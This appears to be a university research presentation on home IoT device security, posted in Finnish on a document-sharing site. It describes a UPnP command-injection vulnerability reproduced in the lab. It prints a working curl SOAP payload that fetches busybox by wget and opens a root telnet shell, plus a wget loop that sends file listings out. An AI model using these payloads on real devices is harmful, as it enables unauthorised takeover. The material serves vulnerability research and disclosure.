Yliopiston IoT-laboratorio esineiden tietoturvaa. 19.5.2016 Tuomas Tenkanen tutkimusavustaja Jyväskylän yliopisto tuomas.s.tenkanen@jyu.



Samankaltaiset tiedostot
Langattoman kotiverkon mahdollisuudet

- ai miten niin?

TEEMME KYBERTURVASTA TOTTA

Suojaamattomia automaatiolaitteita suomalaisissa verkoissa

TUTKI OMAT TIETOTURVA-AUKKOSI. ENNEN KUIN JOKU MUU TEKEE SEN PUOLESTASI. F-Secure Radar Ville Korhonen

Alatunniste

Raspberry Pi. Yhden piirilevyn tietokone. Tässä dokumentissa kerrotaan yleistä tietoa Rasberry Pi- tietokoneesta ja. sen toiminnoista.

Harjoituksen aiheena on tietokantapalvelimen asentaminen ja testaaminen. Asennetaan MySQL-tietokanta. Hieman linkkejä:

Tietoverkkojen turvallisuus. Tuomas Aura T Johdatus tietoliikenteeseen kevät 2012

w4g Kotimokkula käyttöopas

Järjestelmän asetukset. Asetustiedostojen muokkaaminen. Pääkäyttäjä eli root. Järjestelmänhallinnan työkalut

Security server v6 installation requirements

VALVO JA VARAUDU PAHIMPAAN

Tietoturvallisuus yhteiskunnan, yritysten ja yksityishenkilöiden kannalta

LINUX-HARJOITUS, MYSQL

Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet. Käyttöjärjestelmä: Mac OS X

Suojaamattomien automaatiolaitteiden kartoitus 2016

KEMI-TORNIONLAAKSON KOULUTUSKUNTAYHTYMÄ LAPPIA LANGATON VIERAILIJAVERKKO 2(7) VERKKOYHTEYDEN MÄÄRITTELY WINDOWS XP:LLE (WINDOWS XP SP3)

TEEMME KYBERTURVASTA TOTTA

Tietoa ja ohjeita Hämäläisten ylioppilassäätiön asuntoloiden laajakaistaverkon käytöstä

Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Jykes &

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Mac OS X

Taloyhtiön laajakaistan käyttöohje, Tekniikka: Ethernet. Käyttöjärjestelmä: Windows XP

TIETOPAKETTI EI -KYBERIHMISILLE

Jyväskylän kokemuksia

Javan asennus ja ohjeita ongelmatilanteisiin

Internet ja tietoverkot 2015 Harjoitus 7: Kertaus

Lukio ja sähköiset ylioppilaskirjoitukset Tieto- ja viestintätekniikka selvitys 2014

F-SECURE SAFE. Toukokuu 2017

Salausmenetelmät (ei käsitellä tällä kurssilla)

Suomen kyberturvallisuusstrategia ja toimeenpano-ohjelma Jari Pajunen Turvallisuuskomitean sihteeristö

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows XP

Security server v6 installation requirements

Kodin automatisointi - Kehitystrendejä

Metropolia Ammattikorkeakoulu

BigData - liikenne esimerkkinä. Tietoyhteiskunta-akatemia Ostrobotnia, Helsinki

- ai miten niin?

Sulautettu tietotekniikka Kimmo Ahola

Siirtyminen IPv6 yhteyskäytäntöön

MARA-ALAN LIIKETOIMINNAN TIETOTURVALLISUUSUHAT

Kyberturvallisuus on digitalisaation edellytys ja mahdollistaja - miksi ja miten?

Käyttöoppaasi. F-SECURE MOBILE SECURITY 6 FOR ANDROID

WELHO ADSL -LAAJAKAISTAPALVELUIDEN PALVELUKUVAUS KULUTTAJA-ASIAKKAILLE (alkaen )

Turvaa langattomat laitteesi ja verkkosi. Harri Koskinen Rossum Oy

1. päivä ip Windows 2003 Server ja vista (toteutus)

Internet Protocol version 6. IPv6

Verkostoautomaatiojärjestelmien tietoturva

TEEMME KYBERTURVASTA TOTTA

Tietoverkkojen turvallisuus. Tuomas Aura T Johdatus tietoliikenteeseen kevät 2011

Määrittelydokumentti NJC2. Helsinki Ohjelmistotuotantoprojekti HELSINGIN YLIOPISTO Tietojenkäsittelytieteen laitos

Millainen on viihtyisä kaupunki ja miten sitä mitataan?

Verkostoautomaatiojärjestelmien tietoturva

IT-OSAAJA, TIETOJENKÄSITTELYN ERIKOISTUMISOPINNOT

GSRELE ohjeet. Yleistä

Digimarkkinoinnin uudet pelisäännöt Huhtikuu 2015

Ei raportteja roskiin

Taloyhtiön laajakaistan käyttöohje, Tekniikka: HomePNA. Käyttöjärjestelmä: Windows XP

Avoimet laitteet - riski verkossa Antti Kiuru@KiuruAntti Kyberturvallisuuskeskus, Viestintävirasto. Antti Kiuru, Tilannekeskuksen päällikkö

eduroamin käyttöohje Windows

Verkkoliikenteen rajoittaminen tietoturvasta huolehtimiseksi ja häiriön korjaamiseksi

KASVAVAN KYBERTURVAMARKKINAN PELINTEKIJÄ

Loppukäyttäjän ohje Asennus- ja käyttöohje Mac

NÄIN OTAT F-SECURE SAFEN KÄYTTÖÖN

Aikamatka digitaaliseen tulevaisuuteen: olemmeko turvassa? Pekka Jykes &

Garmin laitteiden ohjelmistopäivitys

Kahden virtualisointiohjelmiston suorituskyvyn testaus (valmiin työn esittely)

TIETOTURVALLISUUDESTA

Liiketoimintaa ICT-osaamisesta vahvuuksilla eteenpäin. Jussi Paakkari, teknologiajohtaja, VTT, R&D, ICT

Luento 5. Timo Savola. 28. huhtikuuta 2006

ZA4881. Flash Eurobarometer 241 (Information society as seen by EU citizens) Country Specific Questionnaire Finland

T Cryptography and Data Security

Peliohjelmointi: Kontrollilaitteet. Teppo Soininen

Tavaroiden ulkomaankauppatilastojen tulkinnan haasteet Timo Koskimäki

Unix-perusteet. Unix/Linux-käyttöjärjestelmä ja sen ominaisuudet

TIEA222 Tietoturva, laboratoriotyö 1

Käyttöjärjestelmät(CT50A2602)

Vaivattomasti parasta tietoturvaa

Ti LÄHIVERKOT -erikoistyökurssi. X Window System. Jukka Lankinen

1999 valmiiksi 35 laitteen prototyyppisarja radiolla (kotelo halvalla )

Sulautettu tietotekniikka Ubiquitous Real World Real Time for First Lives

Siemens Webserver OZW672

Enemmän voitonriemua. Vähemmän tylsiä hetkiä. Pelien ja sovellusten jakaminen Sonera Viihde -palvelussa

IoT (Internet-of-Things) - teknologian hyödyntäminen rakennuksien paloturvallisuuden kehityksessä ja integroidussa älykkäässä ympäristössä

Tietoyhteiskunnan haavoittuvuus kuinka voimme hallita sitä?

KYBERTURVAMARKKINA KASVAA TEEMME KYBERTURVASTA TOTTA

Laitteessa tulee olla ohjelmisto tai uudempi, tarvittaessa päivitä laite

Maailman ensimmäinen Plug & Go etäyhteyslaite

- ai miten niin?

Yleinen ohjeistus Linux tehtävään

Tietoturvan haasteet grideille

Identiteetin merkitys seuraavan sukupolven tietoturva-arkkitehtuurissa. Janne Tägtström Security Systems Engineer

Puhelinnumeroiden lataaminen laitteesta tietokoneelle

Unix-perusteet. Tiedosto-oikeudet

ZENworks Application Virtualization 11

T-Cam IPC900 HD PTZ valvontakamera

VMU-C EM. Asennus ja käyttö

Luento 3. Timo Savola. 7. huhtikuuta 2006

Tietokoneiden ja mobiililaitteiden tietoturva

Pika-aloitusopas 4G-reititin Huawei E5172

Taloyhtiön laajakaistan käyttöohje, Tekniikka: ADSL/ADSL2/ADSL2+ Käyttöjärjestelmä: Windows Vista

Transkriptio:

Yliopiston IoT-laboratorio esineiden tietoturvaa 19.5.2016 Tuomas Tenkanen tutkimusavustaja Jyväskylän yliopisto tuomas.s.tenkanen@jyu.fi

LaiTSo Jyväskylän yliopiston IoT-laboratorio on perustettu osana INKA EAKR Laiteläheinen tietoturvateknologia ja sovellutusmahdollisuudet (LaiTSo) -projektia. Projektin rahoittajina EAKR/Tekes, Jyväskylän yliopisto, Keski-Suomen liitto, Jyväskylän seudun kehittämisyhtiö Jykes, Pardco Group Oy ja Lookinno Oy. Vastuullisena johtajana dekaani Pekka Neittaanmäki, projektipäällikkönä Otto Hrad.

Internet of Things "A global infrastructure for the information society, enabling advanced services by interconnecting (physical and virtual) things based on existing and evolving interoperable information and communication technologies." ITU-T

Thing "With regard to the Internet of things, this is an object of the physical world (physical things) or the information world (virtual things), which is capable of being identified and integrated into communication networks." ITU-T Mikä tahansa verkkoon liitettävä laite. Yleensä ei perinteinen tietokone tai verkkolaite tietokoneen käsite hämärtyy IPv4/IPv6 (TCP, UDP, ICMP), mutta laajemmin ajateltuna myös muut verkkoteknologiat.

IoT-ennusteita Vuonna 2016 6-10 miljardia laitetta Gartner, Business Insider Vuonna 2020 20-30 (-100) miljardia laitetta McKinsey, Gartner, Business Insider Vertailuna 2016: 3,3 mrd internet-käyttäjää 1 mrd web-sivustoa Internet Live Stats

Automaatiojärjestelmät 21.3.2013 Suomalaisia automaatiojärjestelmiä suojaamattomana verkossa Viestintävirasto 2013, Tiilikainen & Manner n. 3000 laitetta suojaamattomana verkossa 31.3.2015 Viestintävirasto etsii tietoverkoista suojaamattomia automaatiolaitteita Viestintävirasto 2015a 29.6.2015 Yhä suuri määrä suojaamattomia automaatiojärjestelmiä Viestintävirasto 2015b, Viestintävirasto 2015c ei merkittävää muutosta 16.5.2016 Viestintävirasto jatkaa selvityksiä automaatiojärjestelmien suojaamattomista yhteyksistä Viestintävirasto 2016 "Selvitys toteutetaan lähettämällä yhteydenavauspyyntöjä suomalaisissa verkoissa olevien tietokoneiden ja verkkolaitteiden tiettyihin tietoliikenneportteihin ja tarkkailemalla niistä tulevia vastausviestejä."

Jääkaappi hyökkää Tekniikka & Talous 2016 ilmalämpöpumppu valvontakamera lypsyrobotti viritinvahvistin laajakaistamodeemi mediatoistin roskaposti hajautettu palvelunestohyökkäys firmware-päivitykset ohjelmistopäivitykset salasanojen vaihtaminen tietoliikenneporttien vaihtaminen

JY:n IoT-laboratorio IoT-laboratorio on tutkimuslähtöinen laboratorioympäristö tukemaan tutkimusta, jossa laskenta-alusta on liitetty erilaisiin sensoreihin, laitteisiin ja tietoväyliin, joilla voidaan kerätä ja lukea tietoa, sekä luoda tutkimusta tukevia toimintaympäristöjä, ja jossa aiemmin kehitettyjä ratkaisuja voidaan edelleen kehittää erilaisiin ympäristöihin soveltuviksi sekä ottaa turvallisuusratkaisut osaksi kyberturvallisuuskoulutusta. Tarkoituksena luoda kotikäyttäjän verkkoa vastaava wlan-verkko, jossa voidaan tutkia kodin IoT-laitteiden tietoturvaa ja -liikennettä. Tutkimuksen kannalta oleellista saada kaapattua laitteilta tuleva ja laitteille menevä liikenne sekä voida tutkia pakettikaappauksia jälkikäteen. Pakettien kaappaaminen reitittimeltä, joten asennettiin pöytäkone reitittimeksi internetin ja wlan-verkon väliin. Tällöin kaappaus voidaan tehdä reititinkoneen verkkokortin kautta.

IoT-laboratorion verkko 4g-yhteys internetiin 4g-reititin Kali Linux -reititinkone liikenteen seuranta pakettikaappaukset Wlan-reititin

IoT-laboratorion laitteita

Case study Tutkittava laiteperhe sisältää etähallittavia kodin elektroniikkalaitteita. UPnP on joukko protokollia, joiden tarkoitus on saada erilaiset verkkolaitteet toimimaan helposti keskenään Laitteet lähettävät ja vastaanottavat UPnP-viestejä, joilla voidaan ohjata laitteiden toimintoja. UPnP ei protokollana sisällä autentikointia vaan esim. WeMo-laitteiden osalta käyttäjän on luotettava wlan-verkon suojaukseen Laitteet myös mainostavat verkkoon omia palveluitaan protokollan mukaisesti: esim. JY IoT-laboratorion laitteen palvelukuvaukset löytyvät osoitteesta http://192.168.16.194:49153/setup.xml

Tunnettu haavoittuvuus Tripwire/The State of Security julkaisi 25.11.2015 Bryon Hartin artikkelin My SecTor Story: Root Shell on the ###### Artikkelissa kuvataan miten tutkittavaan laitteeseen saadaan telnet-yhteys ja root-oikeudet UPnP-viestejä ja Linuxin command substitution -toiminnallisuutta hyödyntäen. Haavoittuvuus ei ollut suoraan toistettavissa laboratorion laitteilla, koska laitteista puuttui telnetd-ohjelma. Laboratoriossa pystyttiin kuitenkin suorittamaan komentoja laitteilla, esim. reboot-komennolla pystyttiin käynnistämään laite uudestaan.

Jatkotutkimuksia Jatkotutkimuksissa pyrittiin selvittämään mitä ohjelmia laboratorion laitteilla on asennettuna. Havaittiin, että esim. ls, ping ja wget ovat asennettuna ja sekä if- että for-kontrollirakenteet toimivat. Näillä tiedoilla pystyttiin varmistamaan, että komentoja voidaan todellakin ajaa ko. laitteilla ja saatiin lisää tietoja laitteista, mm. tiedostolistaukset http-pyyntöjen kautta: for a in ls /bin; do wget http://192.168.16.1/$a; done. Lisäksi pystyttiin selvittämään laitteiden arkkitehtuuri ja siten etsimään oikean tyyppisiä ohjelmia ajettavaksi laitteilla. Havaittiin, että laitteet käyttävät riisuttua busybox-versiota komentotulkkina, minkä vuoksi telnetd-toimintoa ei ole käytettävissä. Asennettiin laboratorion verkkoon http-palvelin tarjoamaan täysi versio busyboxista mips-arkkitehtuurille. Ohjeistettiin UPnP-viestillä tutkittava laite hakemaan uusi busybox ja käynnistämään sillä telnetd laitteelle. Tämän jälkeen voitiin kirjautua telnetillä root-oikeuksin laitteeseen ja saatiin alkuperäinen haavoittuvuus vahvistettua.

Miten curl -0 -A '' -X POST -H 'Accept: ' -H 'Content-type: text/xml; charset="utf-8"' \ -H "SOAPACTION: \"urn:######:service:basicevent:1#setsmartdevinfo\"" \ --data '<?xml version="1.0" encoding="utf-8"?> \ <s:envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" \ s:encodingstyle="http://schemas.xmlsoap.org/soap/encoding/"> \ <s:body><u:setsmartdevinfo xmlns:u="urn:######:service:basicevent:1"> \ <SmartDevURL>\ `cp /bin/busybox /tmp/busybox; \ wget http://192.168.16.1/busybox; \ cp /tmp/busybox /tmp/telnetd; \ cp /tmp/busybox /tmp/sh; \ /tmp/telnetd -l /tmp/sh`\ </SmartDevURL></u:SetSmartDevInfo></s:Body></s:Envelope>'\ -i http://192.168.16.194:49153/upnp/control/basicevent1

Hyökkäysskenaario Laitteissa firmware-päivitystoiminto ja päivittämättömistä laitteista saadaan koko tiedostojärjestelmä ulos. On mahdollista ladata laitteesta vanha firmwareversio, muokata sitä (esim. versionumero, tarjolla olevat ohjelmat, käynnistyessä ajettavat ohjelmat), allekirjoittaa muokattu firmware laitteisiin sisältyvällä avaimella ja tarjota väärää päivitystä olemassa oleville laitteille. Menetelmä ei ole yksinkertainen, mutta teoriassa mahdollistaa kaikkien saman tuoteperheen laitteiden haltuunottamisen.

Toinen haavoittuvuus 3.3.2016 saatiin vahvistettua, että myös toisen hyvin samankaltaisen UPnP-viestin käsittelyyn liittyy vastaava, aiemmin tuntematon haavoittuvuus. Valmistaja on korjannut molemmat URLosoitteiden käsittelyyn liittyvät haavoittuvuudet toukokuussa 2015 julkaistulla firmwarepäivityksellä. Laboratorion laitteet on hankittu marras-joulukuun 2015 aikana, joten kaupoissa on edelleen saatavilla haavoittuvia laitteita.

Yleisiä havaintoja kodin IoT-laitteista Edullisia Linux-pohjaisia toteutuksia, osa hyvinkin vanhoja Useimpien laitteiden suojaus perustuu vain ja ainoastaan verkon suojaukseen mikäli pääsy verkkoon, pääsy laitteille Laitteet voidaan kaataa esim. DOS-hyökkäyksillä. Laitteet saadaan pakotettua toiseen wlan-verkkoon. Joidenkin laitteiden tiedostojärjestelmät saadaan ulos suoraan tallennusvälineiltä muualle verkkoon (dd, ftpput) Laitteet hakevat kysymättä käyttäjän tietoja puhelimelta, jolla laitteita hallitaan. Laitteet lähettävät kysymättä tietoja valmistajalle. Laitteet vaikuttavat toimivan osittain epäluotettavasti ja arvaamattomasti. selkeästi ensimmäisen sukupolven laitteita Jotkut laitteet huomattavasti luotettavammin toteutettuja kuin toiset hinta ei korreloi

TIEA345, IoT-prototyypit Yhtenä tavoitteena LaiTSo-projektille ja siten IoTlaboratoriolle on kehittää opetusta IT-tiedekunnassa ja tietotekniikan laitoksella. Ensimmäisenä tuloksena kesäperiodissa 2016 järjestetään pilottitoteutus TIEA345 IoT-prototyypit - kurssista. "Kurssilla tutustutaan IoT-laitteisiin hands-on -tyylillä. Alustana Raspberry Pi sekä mahdollisesti muita. Kurssi suoritetaan käytännön demoilla, joissa kootaan toimiva laitekokonaisuus ja opetellaan lukemaan dataa sensoreilta sekä siirtämään sitä verkkoon."

Laitekirjasto IoT-laboratorion tavoitteisiin kuuluu myös muun tutkimuksen tukeminen ja tätä tarkoitusta varten perustetaan IoT-aiheinen laitekirjasto. Esimerkkinä laitekirjaston toiminnasta Raspberry Pi + SenseHAT -yhdistelmä liikunta-aktiivisuustutkimuksessa.

Kybertiimin muita tutkimusaiheita tilannetietoinen kyberturvallisuus tilannekuvajärjestelmät salatun liikenteen NIDS kriittisen infrastruktuurin turvaaminen hunajapurkit työkaluina haittaohjelma-analyysi DNS-tunnelointihyökkäysten analyysi

Lähteet Business Insider http://www.businessinsider.com/how-the-internet-of-things-market-will-grow-2014-10?r=us&ir=t&ir=t Gartner http://www.gartner.com/newsroom/id/3165317 Internet Live Stats http://www.internetlivestats.com/ ITU-T http://handle.itu.int/11.1002/1000/11559-en?locatt=format:pdf&auth McKinsey http://www.mckinsey.com/industries/high-tech/our-insights/the-internet-of-things-sizing-up-the-opportunity My SecTor Story http://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/ Tekniikka & Talous 2016 http://www.tekniikkatalous.fi/tekniikka/tiesitteko-etta-ilmalampopumppuanne-kaytetaan-palvelunestohyokkaykseen-nettiin-kytketytlaitteet-levittavat-haittaohjelmia-6244933 Tiilikainen & Manner https://research.comnet.aalto.fi/public/aalto-shodan-raportti-julkinen.pdf Viestintävirasto 2013 https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2013/03/ttn201303211339.html Viestintävirasto 2015a https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/03/ttn201503311629.html Viestintävirasto 2015b https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/06/ttn201506291423.html Viestintävirasto 2015c https://www.viestintavirasto.fi/attachments/cert/tietoturvakatsaukset/erityisraportti_suojaamattomia_automaatiolaitteita_suomalaisi ssa_verkoissa.pdf Viestintävirasto 2016 https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2016/05/ttn201605160958.html